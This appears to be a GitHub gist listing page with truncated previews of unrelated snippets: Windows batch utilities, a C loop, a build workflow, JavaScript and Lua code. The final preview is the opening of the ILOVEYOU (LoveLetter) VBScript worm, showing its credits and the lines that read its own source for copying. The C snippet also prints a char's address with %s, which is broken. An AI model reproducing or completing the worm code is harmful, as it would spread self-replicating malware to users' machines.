// jQuery
$(document).ready(function() {
// code
})
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
@echo off | |
prompt [$P]^ | |
$$$S | |
@echo on |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<!-- : | |
@echo off | |
setlocal | |
set __p=%systemroot%\System32\WindowsPowershell\v1.0\powershell.exe | |
2>nul >nul %__p% /? | |
if not errorlevel 0 goto :eof | |
set stop=:eof | |
set internal=%~n0 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#include <stdio.h> | |
int main() { | |
for (char i = 0; i < 127; i++) | |
printf("%s", &i); | |
} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
name: Build executable | |
on: workflow_dispatch | |
env: | |
name: PLACE_REPO_NAME_HERE | |
CARGO_TERM_COLOR: always | |
jobs: | |
build: |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Array.prototype.forEach.call([].slice.call(document.querySelector("#gallery-0").childNodes, 1), function(elem) { | |
console.log(decodeURI(/(File:.+?)\?/gm.exec(elem.childNodes[0].href)[1])); | |
}); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
@echo off | |
for /F "skip=2 tokens=3*" %%A in ('reg query "HKCU\Software\ROBLOX Corporation\Environments\roblox-player" /ve') DO (set robloxpath=%%A) | |
setlocal DisableDelayedExpansion | |
set splitter=\RobloxPlayerLauncher.exe | |
setlocal EnableDelayedExpansion | |
set LF=^ | |
rem ** Two empty lines are required |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
@echo off | |
set args=%* | |
if [%args%] EQU [] ( | |
tasklist | |
set /p args=Taskname to kill:^ | |
) | |
taskkill /f /im %args% |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
valid_string = 'A programming language is any set of rules that converts strings, or graphical program elements in the case of visual programming languages, to various kinds of machine code output.' | |
function file_exists(file) | |
local f = io.open(file, 'rb') | |
if f then f:close() end | |
return f ~= nil | |
end | |
function parse(command) | |
if command == valid_string then |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
rem barok -loveletter(vbe) <i hate go to school> | |
rem by: spyder / ispyder@mail.com / @GRAMMERSoft Group / Manila,Philippines | |
On Error Resume Next | |
dim fso,dirsystem,dirwin,dirtemp,eq,ctr,file,vbscopy,dow | |
eq="" | |
ctr=0 | |
Set fso = CreateObject("Scripting.FileSystemObject") | |
set file = fso.OpenTextFile(WScript.ScriptFullname,1) | |
vbscopy=file.ReadAll | |
main() |
NewerOlder